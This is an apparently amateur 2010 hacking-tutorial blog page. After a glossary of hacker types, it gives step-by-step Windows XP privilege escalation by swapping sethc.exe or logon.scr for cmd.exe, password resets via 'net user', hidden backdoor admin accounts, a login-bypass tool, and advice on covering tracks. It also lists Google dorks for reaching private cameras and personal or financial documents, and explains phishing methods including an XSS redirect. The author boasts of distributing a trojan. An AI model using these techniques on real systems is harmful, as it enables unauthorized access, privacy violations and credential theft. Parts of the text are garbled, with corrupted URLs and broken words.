Dec 17, 2010

For The Basic Information about Hacking please Visit the link given below

~Click Here~
___________________________________________________

~Hacking Tools~

and Other Tools on Depending Upon the Situation we'll be disussed later.....


Now i'll continue to the Hacking techniques which other Cyber Professional's used to Prevent Hacki
ng from Crackers and other Threats .
Let's Start with the basic's..


What is hacker ?




The term "hacker" is often used to refer to a computer pirate. Victims of piracy on computer networks like to think they have been attacked by experienced pirates who have carefully studied their system and developed specific tools to exploit its flaws.

The term hacker has had more than one meaning since it first appeared in the late 1950s. In the beginning, this word was favourably used to describe expert programmers. Then in the 1970s it was used to describe computer revolutionaries, who mostly went on to become the founders of major computer companies.

It was during the 1980s that this word was used to categorize people involved in video game piracy, by disabling the protections on these games and reselling copies of them.

Today, this word is often wrongly used to refer to people who break into computer systems.

The Varios Types of Hackers or you can also say Pirates.

In reality there are various types of "Attackers" categorized in function of their experience and motivations:


A) " White Hat-Hackers ", Hackers in the noble sense of the term, whose goal is to help improve computer systems and technologies, are generally responsible for the main computing protocols and tools we use today; E-mail is one of the best examples;

B) " Black Hat-Hackers ", more commonly called Pirates, are people who break into computer systems for malicious purposes;

i). " Script kiddies " (also sometimes called crashers, lamers and packet monkeys) are young network users who use programs they have found on the Internet, often ineptly, to vandalize computer systems for fun.

ii). " Phreakers " are pirates who use the switched telephone network (STN) to make free phone calls thanks to electronic circuits (called boxes, like the blue box, the violet box, etc.) connected to the telephone line in order to manipulate its functioning. The word "phreaking" therefore refers to telephone line piracy.

iii). " Carders " mainly attack chip card systems (particularly bank cards) to understand how they work and to exploit their flaws. The term carding refers to chip card piracy.

iv). " Crackers " are not cheese snacks but rather people aiming to create software tools that make it possible to attack computer systems or crack the copy protection of user-fee software. A "Crack" is therefore an executable program created to modify (patch) the original software to as to remove its protection.

v). " Hacktivists " (contraction of hackers and activists) are hackers with mainly ideological motivations. The term has been widely used by the press, to convey the idea of a parallel community (generally called underground, in allusion to the underground populations of science-fiction films.


C) " HaXor / Lamer " - This is most likely what you are. I am not trying to be insultive, but its the truth. You want to be a hacker but you have no knowledge of computers, their architecture, or the internet and its realm. Lamers, also called script kiddies, attempt to "hack" someone by sending them a virus, trojan horse or some program coded by someone else for malicious intent. Typically, lamers are pretty ignorant and brag when and if they do successfully sucker someone online.
To clear the air, Zekski (ncb19) IS NOT a hacker. I sent him a trojan horse that was written by me, and at the time, he was a no one, so he had nothing to offer. Weeks later, he asked me to show him how to "hack" and he was very annoying. I showed him how to use Poison Ivy designed by ChaseNet.org (you can download it from there). The only difference between the one I coded and the one I taught Zekski how to use, was mine was undetectable). The biggest mistake I did was show that ass how to use a trojan. Since showing him, he has sent a client to over 100 people easily. Thus aquiring a rank of "hacker". Haha, LAMER? Yep. Perfect example right there.

D) " Gray Hat-Hackers " , These guys are between the good and the bad .



In reality, this type of distinction is not so clear, in that some white hat hackers at some point have been black hat hackers and vice versa. Regular users of distribution lists and forums often see subjects discussing the difference that should be made between a pirate and a hacker. The term troll is generally used to refer to sensitive subjects that stir up intense responses.

Some examples of Trolls :

* I've been attacked by a hacker
* Is Windows more solid than Mac?
* Is it better to use PHP or ASP?
* etc.



~Hackingzz~

There are various Techniques to Hack and get into a Particular Computer system it depends on the way of hacking and also what you people really want to Hack.

For hacking a system you have to follow the rules which are the basic characterstics of an Ethical-Hacker.

i) Paitience - It play's very important Role in Hacking , If you lose Your Patience While hacking Then Fuck off You'r not an Hacker.....

ii) Solution of Prob
lem - Think from depth of a particular problem that your going to solve...

iii)Work Smartly - You Attentive and work smartly in this Field.

Iv) Evidene - Never Leave an evidence by which an administrator can caught you.....


And other you all be able to know while hacking a system.

The complete Hacking Structure is divied into various categories some of them are discussed below.

i). System-Hacking.
ii). Web-Hacking.
iii). Lan-Hacking.
iv). Data-Base-Hacking.
V). Hardware-Hacking.

Let's Start with Windows Hacking into System-Hacking Category.


Window-Hacking , Well Security Architecture of microsoft windows is categories in three ways.

i) LSA (Local Security Authority) , It is also known as security sub system it handles local system policies and user authentication. The LSA is also handles, Generating and login Audit messages .
ii) SAM (Security Account Manager) ,The SAM handles user and group accounts and provide user authentication on LSA .

iii)SRM (Security Reference) ,Security reference monitor is incharge for enforcing and assuring access validation and auditing of LSA. It references user account information as the user attempts to access resources.


SAM FILE
:- Passwords are not stored in this file whether their hashes are being stored. Direct manipulation on this file is not possible.To secure SAM file we
activate sys-key function in windows.


To Activate Sys-Key :- Go on RUN tab under START MENU in microsoft windows right 'syskey' over there. Click on Encryption enable Update Click on Password Setup confirm your passwords and hence your able to secure your SAM file.The Thumnails are shown below :











~Video Tutorial of SysKey Enabling~


~Microsoft Windows Hacking~


You can categories Window Hacking in two types :

1). Registry Hacking .
2). User Accounts Admin-Hacking.
3). Making Changes in the look and in an Appearances of the Windows.


For Hacking into Windows Registry First of all you need a good software for to defrag registry because Such as ( TuneUp Utilities or Registry Cleaner ) once your registry get's corrupted by you while doing practical. Then you have to Format your computer system for new Operating system...

There is anoth
er way to have a complete backup of registry please follow the steps which are mentioned below:

i). Simply just go in Run tab located under Start Menu and Type Regedit.
ii). The complete Registry Box will appears into screen.
iii). After that Click on File option in, File option there is the option of Export Just Give the desired name and Your backup of registry will be made in desired location.

For Other Registry Related Tips and Tricks Please follow the Url Mentioned below :

In this Website You will find the most probably used Tricks that are used in Registry-Hacking.


Please Note:- Please do it at your own Risk the author of this blog shall not be responsible for any types of mishappening caused in your system by you ..


Now Comes User Accounts Admin-Hack..

For this you have to require following softwares to hack into any windows account the list is mentioned below...

i). ERD Commander .
ii). Admin Hack (for to break sys-key password) .
iii). OPH Crack .
iv). Dream_Pack_Pl .


The Tools mentioned above are discussed below :


ERD Commander
, " This
Bootable CD is generally used for resetting any kind of User Account Password Directly and also to make any changes to windows by Cyber Professional " .

Admin-Hack , "This Bootable CD is used for resetting User Account and Syskey Passwords" .



OPH-Crack , "This Bootable CD is used for to display Account passwords which is stored in SAM file in the form of Hashes or Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux." .

Dream_Pack_PL ,"This Bootable CD is used for resetting Administrator's Account's Password" The Steps by resetting password from this software are given below :
Recover The Password Using Dream_Pack_Pl

Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL http://www.d%c3%83%c2%a2%c3%82%e2%82%ac%c3%82%e2%80%9cb.webpark.pl/dreampackpl_en.htm
bpark.pl/dreampackpl_en.htm
3. Unzip the downloa
ded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have
the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to i
nstall DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery c
onsole.
8. Select the Wind
ows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)

10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out di
sk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top g
raphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and e
nable the options and enable the god command.
15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have alrea
dy labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass theWindows Login screen and it is not destructive.

And Also There are Various Techniques To Hack into Windows-XP User Accounts Which are Disscussed Below..

Administrator Account Hack from Guest Account " , If you want to hack your college's pc with full privileges acces into an Administrator Account from the Guest Account you have to follow the steps mentioned below ..

i). Login into your Guest Account and Go to C:/win
dows/system32/ .
ii). Copy cmd.exe and paste it on Desktop .
iii). Rename cmd.exe by sethc.exe .
iv). Copy the new sethc.exe back to its original loc
ation in C:/windows/system32/, When windows asks for overwriting the file click yes .



v). Now Log out from Guest account and at the user option Window press the Shif key 5 Times.
vi). Instead of sticky key the new Dialouge Box appears into the screen of Command Prompt with full administrator privileges.


vii). Now Type " NET USE
R ADMINISTRATOR ABC " (remember caps lock is on) where ABC can be any password which you desired and after that press enter.
viii). You will See " Command completed successfully " dialogue and then exit the command prompt and login into ur admin account with full access .
viiii). Congracts you hacked into an Admin Account Successfully Have Fun .

and also you can create new admin user at the command prompt by typing " NET USER SUMMIT /ADD " where SUMMIT is the new username which you would like to add with adminstrator Privileges.

Also you can hide your new account by admin simply go in registry editor and navigate to this key by

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value write its name as the " user name " that you have created for an admin account and live with your admin account forever have fun guys..


I hope the information given below was useful to you guys dont forget to give response.
___________________________________________________

Windows-XP Privileges
Escalation Exploit

(Before you continue Read Please Read CareFully)

Here are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is SUMMIT and you want change the password to Pass. Then type in the following command

net user SUMMIT pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.


Note , " To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail " .

___________________________________________________


Now I Will Disc
uss Some RUN Shortcuts located in start menu, if you people think that RUN is useless then you might be wrong because i am going to list some important shortcuts which may vary into your work while working on computer.......


Run Commands:


compmgmt.msc - Computer management
devmgmt.msc - Device manager

diskmgmt.msc - Disk management
dfrg.msc - Disk defrag

eventvwr.msc -
Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Gr
oup policies
lusrmgr.msc - Local use
rs and groups
perfmon.msc -
Performance monitor
rsop.msc - Resul
tant set of policies
secpol.msc - Local security settings
services.msc - Various
Services
msconfig - System Configuration Utility
regedit - Registr
y Editor
msinfo32 _ Sy
stem Information
sysedit _ System Edit
win.ini _ window
s loading information(also system.ini)
winver _ Shows current v
ersion of windows
mailto: _ Op
ens default email client
command _ Opens command prompt



Run Commands to access the control panel:


Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl

Display Properties control desk.cpl

FindFast contr
ol findfast.cpl
Fonts Folder control fonts
Internet Proper
ties control inetcpl.cpl
Keyboard Prop
erties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control p
rinters
Sound Propert
ies control mmsys.cpl sounds
System Properties control sysdm.cpl


for other types of hacking into windows are generally discussed as a funny stuff such as to change boot screen play with windows system file's also to change view of windows etc etc.
for this you have to download Resource Hacker Kit from with the help of this you are available to change any kind of other stuff in microsoft windows..


and i also recommend to downloads all win security softwares wich are surely essentials for a normal user.

Win Security Tools

Guys i also Recommend you to download all kinds of commands list which may be helpfull to you all people while working have fun guys........

Best Keyboard Shortcuts
Create One-click Shutdown And Reboot Shortcuts
General Keyboard Shortcuts
Keyboard Shortcuts Result in Excel 2000 - Movement
Keyboard Shortcuts, Microsoft Word
Keyboard Shortcuts, must read
Nice list of windows shortcuts


Remember all this files are in PDF format you might be require Adobe Pdf Reader and these all files are password Protected password is given below.




Password : http://www.hackingzz.blogspot.com/






P for passwords

Yellow BeardInternet and computer security is a funny thing, the more security protocols put in place to protect a system the more gears there are to muck of the engine. And none are successful if you have the username and password to get in. There are lots of way for a prospective hacker to discover the username and password of a user. Usernames are easy to find, most are e-mail names so all that remains is a password. Finding the password may be a little more difficult, but is still obtainable because people are creatures of habit and use the same code for everything. And the code is almost always somebody’s name that is close to him or her. Still, that require more work that most hacker want to do, and most users don’t have enough access to get them into anything of any real value. So what the next best thing? The network Admins username and password, and how easy is that—real easy baby.

I don’t like to stereotype myself with any group or type, but computer people are all the bloody same. They watch the same TV shows, read all the same books, and use the same passwords. That’s right; use the same passwords. (as far as the goes end-users use the same passwords too.) So, in most cases it’s easy to just guess at from a list of command geek passwords.

The most common Password Pattern: Pet's name, User's own name or initials, Spouse's name Children's, names, Favorite sport, team, hobby, or recording artist. Birthdays (Women also use their wedding date or children's birthdays. Men never seem to use these.)

The four most common User Passwords are Love, God, Secret and Sex.Here a the List Given Below of Some common Passwords.

1). Common Passwords for a Network_Administrator.
2). Common Passwords for a Enduser.
3). Passwords used in Cracker_Dictionary.
4). Common Bios_Passwords.
5). Windows Logon_Passwords.




___________________________________________________

~Go
ogle Hacking the Art of Googelling~

we all internet people in our daily life certainly used the worlds most common search engine yes i am talking about the one and only ' GOOGLE ' for to search various website and other stuff's. do any one here know that google is also used for now a days for hacking purpose..yes i am talking about google hacking , google company has its own database called Google Hacking Data base (GHDB) in this database you will came to know about the various user's which are generally said to be hackers..

Now Here i'll Discuss about Some Tips and Tricks for, To use google for hacking. Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.

1. Hacking Security Cameras

There exists m
any security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows

As you can see in the above screenshot, you now hav
e access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents


Using Google it is possible to gain access to an e
mail repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls
3. Hacking Google to gain access to Free Stuffs Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.


I hope you all will enjoy this post. Please Feel Free to Pass your comments. So Enjoy Guys!



~How to Send an Anonymous Email~

Before proceeding this please download the required file




to proceed further please read the document carefully mentioned below.



~How to Hack Gmail Account~


~ Inside GoogLe – A Collection
of Strange Links on Google ~


~A Closer Look at a Vulnerability in Gmail~

___________________________________________________

~Phishing~
Guys i've received many mail regarding to this topic ' PHISHING ' guys i let u know that phishing is one of the greatest technique used by hackers for to crack passwords of any mail aur any kind of E-commercer websites.




















So, what is phishing? In a nutshell, phishing is the act of stealing one’s personal information by pretending to be a legitimate and trustworthy entity. Most commonly the target websites are E-Mail services and E-Commerce websites. According to http://www.blogger.com/www.phishtank.com, in the month of December, 2008 the top targets for phishing attacks were:


Top 10 Identified Targets Valid Phishes

JPMorgan Chase and Co. 12,110
PayPal 7,369
eBay, Inc. 262
Bank of America Corporation 212
Sulake Corporation 199
Google 169
Poste Italiane 163
Internal Revenue Service 142
Capital One 128
Wells Fargo 73

Phishing attacks are most commonly executed through E-Mails.

The E-Mails look like they come from trusted sources and ask for personal information like usernames, passwords, credit card numbers, and social security numbers.
To avoid fal ling for phishing attacks, never go to important websites through links in E-Mails. Also, when logging into a website like Yahoo.com, look at the site URL and make sure it says www.yahoo.com or a subdomain like login.yahoo.com. If it doesn’t, you know that it is a fake. For more information on avoiding phishing scams see antiphishing.org.



Phishing Attack Techniques



Once an attacker puts to
gether a phishing website, how does he go about getting victims to go to it? The methods are unlimited, but for those of you who lack creativity, I have put together some of the most common methods used.
• The attacker could add links to web pages with the legitimate website name in the anchor of the hyperlink like the following:
www.yahoo.com .
• The attacker could redirect hacked websites to his fake login page. This will confuse some people, making them think they have to login to their email to access the site. Yes, I know that sounds ridiculous, but people do fall for that. An attacker could use HTML, PHP, and Javascript to redirect the main si te, but the most effective way is to insert a “.htaccess” file that redirects all traffic instead of just certain pages. • The attacker could use XSS (Cross Site Scripting) techniques found in the real websites site to redirect to his website. This is more common in lesser known email service providers. An example is:
www.Targetsite.com/mail.php?inbox= .

This is more deceiving because the victim is first directed to the legitimate website where he is automatically redirected to the attacker’s website via an XSS vulnerability. • The attacker could send out a mass amount of spoofed E-Mails with links to his phishing website. These E-Mails will look like they came from a legitimate source. If you would like to learn more about carrying out phishing attacks.

~Fake login page
~








I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.


___________________________________________________

Botnets

Ever wonder how hackers are able to do all the stuff they do? Many expert hackers do not just log on to systems using manual processes. They get help from robots. Yes, that’s right – robots. Not your typical idea of a robot though but something that is called as such because they work autonomously and automatically.



___________________________________________________

~How to use Keyloggers – Detailed Tutorial and FAQs~



~Click Here to Read this Post~


___________________________________________________